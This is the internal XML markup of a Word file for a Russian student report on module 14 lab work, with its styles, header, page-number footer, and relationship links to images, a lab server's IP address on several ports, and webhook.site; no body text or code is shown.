          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00BB34D7" w:rsidRPr="006B3AE2" w:rsidSect="008C6571">
      <w:headerReference w:type="default" r:id="rId45"/>
      <w:footerReference w:type="default" r:id="rId46"/>
      <w:pgSz w:w="11909" w:h="16834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F29EEE" w14:textId="77777777" w:rsidR="00F34395" w:rsidRDefault="00F34395" w:rsidP="00712AD5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="78A4E46C" w14:textId="77777777" w:rsidR="00F34395" w:rsidRDefault="00F34395" w:rsidP="00712A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</w:rPr>
      <w:id w:val="178632375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098A390" w14:textId="531E3422" w:rsidR="00712AD5" w:rsidRPr="00712AD5" w:rsidRDefault="00712AD5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712AD5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Страница </w:t>
            </w:r>
            <w:r w:rsidRPr="00712A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712AD5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:instrText>PAGE</w:instrText>
            </w:r>
            <w:r w:rsidRPr="00712A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712AD5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00712A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712AD5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> из </w:t>
            </w:r>
            <w:r w:rsidRPr="00712A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712AD5"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 w:rsidRPr="00712A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712AD5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00712A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628015" w14:textId="77777777" w:rsidR="00712AD5" w:rsidRDefault="00712AD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F78B9D" w14:textId="77777777" w:rsidR="00F34395" w:rsidRDefault="00F34395" w:rsidP="00712AD5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3162D845" w14:textId="77777777" w:rsidR="00F34395" w:rsidRDefault="00F34395" w:rsidP="00712A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B7A92A" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRPr="00E86FE6" w:rsidRDefault="00E86FE6" w:rsidP="00E86FE6">
    <w:pPr>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:bCs/>
        <w:highlight w:val="yellow"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00E86FE6">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:bCs/>
      </w:rPr>
      <w:t>Отч</w:t>
    </w:r>
    <w:r w:rsidRPr="00E86FE6">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:bCs/>
        <w:lang w:val="ru-RU"/>
      </w:rPr>
      <w:t>ё</w:t>
    </w:r>
    <w:r w:rsidRPr="00E86FE6">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:bCs/>
      </w:rPr>
      <w:t>т по</w:t>
    </w:r>
    <w:r w:rsidRPr="00E86FE6">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:bCs/>
        <w:lang w:val="ru-RU"/>
      </w:rPr>
      <w:t xml:space="preserve"> лабораторным работам модуля 14</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="32A27166" w14:textId="77777777" w:rsidR="00E86FE6" w:rsidRDefault="00E86FE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3269D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="529A3A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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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802CC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2732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lang w:val="ru-RU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12823"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A78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E5B2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D464C2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652B9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFB81D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3077AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="539AC1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243"/>
    <w:rsid w:val="0001528D"/>
    <w:rsid w:val="000624A1"/>
    <w:rsid w:val="00067501"/>
    <w:rsid w:val="00075C60"/>
    <w:rsid w:val="00085968"/>
    <w:rsid w:val="00090DFF"/>
    <w:rsid w:val="000B5B6A"/>
    <w:rsid w:val="000C6139"/>
    <w:rsid w:val="001360A5"/>
    <w:rsid w:val="001501DE"/>
    <w:rsid w:val="00157C63"/>
    <w:rsid w:val="001A3D71"/>
    <w:rsid w:val="001C1E0A"/>
    <w:rsid w:val="001D06A3"/>
    <w:rsid w:val="001D5B69"/>
    <w:rsid w:val="0026286E"/>
    <w:rsid w:val="00274982"/>
    <w:rsid w:val="002941F7"/>
    <w:rsid w:val="002C145A"/>
    <w:rsid w:val="002C563C"/>
    <w:rsid w:val="003008AB"/>
    <w:rsid w:val="00312587"/>
    <w:rsid w:val="00325FA5"/>
    <w:rsid w:val="00356E1A"/>
    <w:rsid w:val="00363D05"/>
    <w:rsid w:val="003655F0"/>
    <w:rsid w:val="00394C88"/>
    <w:rsid w:val="003D09AF"/>
    <w:rsid w:val="00426C40"/>
    <w:rsid w:val="0043505F"/>
    <w:rsid w:val="00442BD8"/>
    <w:rsid w:val="00444114"/>
    <w:rsid w:val="004453D5"/>
    <w:rsid w:val="0049511A"/>
    <w:rsid w:val="004B5FB2"/>
    <w:rsid w:val="004C597A"/>
    <w:rsid w:val="004E4B9C"/>
    <w:rsid w:val="00500045"/>
    <w:rsid w:val="00522491"/>
    <w:rsid w:val="00532CD6"/>
    <w:rsid w:val="00536311"/>
    <w:rsid w:val="00556471"/>
    <w:rsid w:val="00557B5A"/>
    <w:rsid w:val="0056696C"/>
    <w:rsid w:val="00591AF0"/>
    <w:rsid w:val="0059648B"/>
    <w:rsid w:val="00596813"/>
    <w:rsid w:val="005B44AA"/>
    <w:rsid w:val="005B513E"/>
    <w:rsid w:val="005B73EC"/>
    <w:rsid w:val="005D70AF"/>
    <w:rsid w:val="005E0314"/>
    <w:rsid w:val="005E5E54"/>
    <w:rsid w:val="005F03CD"/>
    <w:rsid w:val="005F6299"/>
    <w:rsid w:val="00657029"/>
    <w:rsid w:val="0068327D"/>
    <w:rsid w:val="00687C5E"/>
    <w:rsid w:val="006905A9"/>
    <w:rsid w:val="006B3AE2"/>
    <w:rsid w:val="006E1CE2"/>
    <w:rsid w:val="007025E7"/>
    <w:rsid w:val="00712AD5"/>
    <w:rsid w:val="00715611"/>
    <w:rsid w:val="00742A38"/>
    <w:rsid w:val="00756C94"/>
    <w:rsid w:val="00795355"/>
    <w:rsid w:val="007D3DE2"/>
    <w:rsid w:val="007D7D1D"/>
    <w:rsid w:val="007E62E6"/>
    <w:rsid w:val="008158A6"/>
    <w:rsid w:val="008179BA"/>
    <w:rsid w:val="00834A73"/>
    <w:rsid w:val="00847588"/>
    <w:rsid w:val="00874416"/>
    <w:rsid w:val="00892E85"/>
    <w:rsid w:val="008C6571"/>
    <w:rsid w:val="008E07B4"/>
    <w:rsid w:val="00912F19"/>
    <w:rsid w:val="00984B91"/>
    <w:rsid w:val="009B3D1E"/>
    <w:rsid w:val="009E5798"/>
    <w:rsid w:val="00A17925"/>
    <w:rsid w:val="00A84DA2"/>
    <w:rsid w:val="00AA5AF3"/>
    <w:rsid w:val="00AF77CC"/>
    <w:rsid w:val="00B31291"/>
    <w:rsid w:val="00B43243"/>
    <w:rsid w:val="00B5518C"/>
    <w:rsid w:val="00B92B4E"/>
    <w:rsid w:val="00BA5285"/>
    <w:rsid w:val="00BB34D7"/>
    <w:rsid w:val="00BB4760"/>
    <w:rsid w:val="00BD1557"/>
    <w:rsid w:val="00BE3664"/>
    <w:rsid w:val="00BE544A"/>
    <w:rsid w:val="00C101DE"/>
    <w:rsid w:val="00C10FA0"/>
    <w:rsid w:val="00C20776"/>
    <w:rsid w:val="00C6447B"/>
    <w:rsid w:val="00C73D83"/>
    <w:rsid w:val="00C9613D"/>
    <w:rsid w:val="00CB78B1"/>
    <w:rsid w:val="00CD784D"/>
    <w:rsid w:val="00CF416A"/>
    <w:rsid w:val="00D0293C"/>
    <w:rsid w:val="00D02BC6"/>
    <w:rsid w:val="00D0608F"/>
    <w:rsid w:val="00D13013"/>
    <w:rsid w:val="00D2220F"/>
    <w:rsid w:val="00D24B61"/>
    <w:rsid w:val="00D325AD"/>
    <w:rsid w:val="00D53173"/>
    <w:rsid w:val="00D622E5"/>
    <w:rsid w:val="00DB4C29"/>
    <w:rsid w:val="00DF0E45"/>
    <w:rsid w:val="00DF2DB8"/>
    <w:rsid w:val="00DF7264"/>
    <w:rsid w:val="00E14217"/>
    <w:rsid w:val="00E479EB"/>
    <w:rsid w:val="00E51B48"/>
    <w:rsid w:val="00E861B0"/>
    <w:rsid w:val="00E86FE6"/>
    <w:rsid w:val="00E94B63"/>
    <w:rsid w:val="00EC2D24"/>
    <w:rsid w:val="00EC513B"/>
    <w:rsid w:val="00ED4BB4"/>
    <w:rsid w:val="00ED58E2"/>
    <w:rsid w:val="00EE1540"/>
    <w:rsid w:val="00EF445B"/>
    <w:rsid w:val="00EF517B"/>
    <w:rsid w:val="00EF7864"/>
    <w:rsid w:val="00F044F3"/>
    <w:rsid w:val="00F11B08"/>
    <w:rsid w:val="00F12773"/>
    <w:rsid w:val="00F30FB9"/>
    <w:rsid w:val="00F331ED"/>
    <w:rsid w:val="00F34395"/>
    <w:rsid w:val="00F40056"/>
    <w:rsid w:val="00F755E6"/>
    <w:rsid w:val="00FA7151"/>
    <w:rsid w:val="00FC0A66"/>
    <w:rsid w:val="00FD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945DA"/>
  <w15:docId w15:val="{4D21BB63-6AB3-4430-85CA-F119A2412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jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="41B94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712AD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12AD5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00712AD5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12AD5"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C145A"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF2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b">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A17925"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004453D5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AF77C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EF445B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="zone-name">
    <w:name w:val="zone-name"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00BB3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59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5.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:5001/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28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://51.250.73.193:8081/" TargetMode="External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://51.250.73.193:8081/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:5002/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2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hyperlink" Target="http://51.250.73.193:8082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webhook.site/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://51.250.73.193:8082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hyperlink" Target="http://51.250.73.193:5001/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId4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18</Pages>
  <Words>1930</Words>
  <Characters>11006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Roman</cp:lastModifiedBy>
  <cp:revision>133</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-20T09:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-21T15:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>